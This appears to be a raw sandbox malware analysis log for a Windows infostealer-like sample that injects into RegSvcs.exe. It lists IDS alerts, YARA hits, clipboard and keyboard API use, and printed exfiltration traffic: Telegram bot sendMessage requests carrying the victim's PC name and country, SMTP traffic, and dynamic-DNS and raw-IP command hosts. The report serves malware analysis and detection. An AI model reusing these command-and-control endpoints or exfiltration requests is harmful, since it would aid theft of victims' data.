Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0123FC19h | 8_2_0123F961
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 069331E0h | 8_2_06932DC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 06930D0Dh | 8_2_06930B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 06931697h | 8_2_06930B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 06932C19h | 8_2_06932968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0693E959h | 8_2_0693E6B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0693E0A9h | 8_2_0693DE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 8_2_06930673
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0693F209h | 8_2_0693EF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0693CF49h | 8_2_0693CCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 069331E0h | 8_2_06932DC3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0693D7F9h | 8_2_0693D550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0693E501h | 8_2_0693E258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0693F661h | 8_2_0693F3B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0693EDB1h | 8_2_0693EB08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0693D3A1h | 8_2_0693D0F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0693FAB9h | 8_2_0693F810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 8_2_06930853
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 8_2_06930040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0693DC51h | 8_2_0693D9A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 069331E0h | 8_2_0693310E

                  Networking

Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49751 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49772 -> 149.154.167.220:443
Source: unknown | DNS query: name: api.telegram.org
Source: Yara match | File source: 1.2.Sancerre.exe.730000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.Sancerre.exe.1450000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: global traffic | TCP traffic: 192.168.2.4:49759 -> 178.210.170.40:587
Source: global traffic | TCP traffic: 192.168.2.4:54663 -> 162.159.36.2:53
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:367706%0D%0ADate%20and%20Time:%2011/01/2025%20/%2000:31:36%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20367706%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:367706%0D%0ADate%20and%20Time:%2011/01/2025%20/%2001:51:01%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20367706%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 193.122.6.168
Source: Joe Sandbox View | ASN Name: PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTR
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49735 -> 193.122.6.168:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49739 -> 193.122.6.168:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49741 -> 193.122.6.168:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49733 -> 193.122.6.168:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49757 -> 193.122.6.168:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49754 -> 193.122.6.168:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49730 -> 193.122.6.168:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49738 -> 104.21.64.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49767 -> 104.21.64.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49758 -> 104.21.64.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49732 -> 104.21.64.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49756 -> 104.21.64.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49734 -> 104.21.64.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49763 -> 104.21.64.1:443
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: unknown | HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49731 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49755 version: TLS 1.0
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Code function: 0_2_00DCCE44 InternetReadFile,SetEvent,GetLastError,SetEvent, | 0_2_00DCCE44
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: global traffic | DNS traffic detected: DNS query: mail.standartasansor.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Fri, 10 Jan 2025 17:46:46 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Fri, 10 Jan 2025 17:47:02 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: RegSvcs.exe, 00000002.00000002.2974305954.0000000002DD3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000003102000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: Sancerre.exe, 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Sancerre.exe, 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: Sancerre.exe, 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2974305954.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, Sancerre.exe, 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000002F81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://aborters.duckdns.org:8081
Source: Sancerre.exe, 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2974305954.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, Sancerre.exe, 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000002F81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anotherarmy.dns.army:8081
Source: RegSvcs.exe, 00000002.00000002.2974305954.0000000002D10000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000002F81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000002.00000002.2974305954.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000002F81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
Source: Sancerre.exe, 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Sancerre.exe, 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
Source: RegSvcs.exe, 00000002.00000002.2984782399.0000000005F70000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micros
Source: RegSvcs.exe, 00000002.00000002.2974305954.0000000002DD3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000003102000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://mail.standartasansor.com
Source: RegSvcs.exe, 00000002.00000002.2974305954.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000002F81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Sancerre.exe, 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2974305954.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, Sancerre.exe, 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000002F81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://varders.kozow.com:8081
Source: RegSvcs.exe, 00000002.00000002.2974305954.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000003066000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: Sancerre.exe, 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2974305954.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, Sancerre.exe, 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000003066000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
Source: RegSvcs.exe, 00000002.00000002.2974305954.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000003066000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: RegSvcs.exe, 00000002.00000002.2974305954.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000003066000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:367706%0D%0ADate%20a
Source: RegSvcs.exe, 00000008.00000002.2973433634.0000000003144000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.000000000308A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: RegSvcs.exe, 00000002.00000002.2974305954.0000000002E06000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enH
Source: RegSvcs.exe, 00000002.00000002.2974305954.0000000002E10000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.000000000313F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: RegSvcs.exe, 00000002.00000002.2974305954.0000000002CA0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2974305954.0000000002D10000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2974305954.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000003040000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000003066000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
Source: Sancerre.exe, 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2974305954.0000000002CA0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Sancerre.exe, 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 00000008.00000002.2973433634.0000000003066000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: RegSvcs.exe, 00000002.00000002.2974305954.0000000002D10000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2974305954.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2974305954.0000000002CCA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000002FFA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000003040000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000003066000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: RegSvcs.exe, 00000002.00000002.2979175921.0000000003F21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003D2F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003DA4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003FF7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003ED3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003D7D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2974305954.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.000000000405F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.00000000040AD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.0000000004326000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.0000000004203000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.00000000040D4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.0000000004251000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.000000000308A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: RegSvcs.exe, 00000002.00000002.2979175921.0000000003D7F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003EAE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003D35000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003EDB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003D0A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.0000000004065000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.00000000040AF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.00000000041DE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.0000000004209000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.000000000403A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.0000000004302000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: RegSvcs.exe, 00000002.00000002.2979175921.0000000003F21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003D2F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003DA4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003FF7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003ED3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003D7D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2974305954.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.000000000405F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.00000000040AD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.0000000004326000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.0000000004203000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.00000000040D4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.0000000004251000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.000000000308A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                  Source: RegSvcs.exe, 00000002.00000002.2979175921.0000000003D7F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003EAE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003D35000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003EDB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003D0A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.0000000004065000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.00000000040AF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.00000000041DE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.0000000004209000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.000000000403A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.0000000004302000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                  Source: RegSvcs.exe, 00000008.00000002.2973433634.0000000003166000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.000000000308A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                  Source: RegSvcs.exe, 00000002.00000002.2974305954.0000000002E37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/H
                  Source: RegSvcs.exe, 00000002.00000002.2974305954.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000003170000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49751 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49772 version: TLS 1.2
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DCEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00DCEAFF
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DCED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00DCED6A
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_005EED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,1_2_005EED6A
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DCEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00DCEAFF
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DBAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_00DBAA57
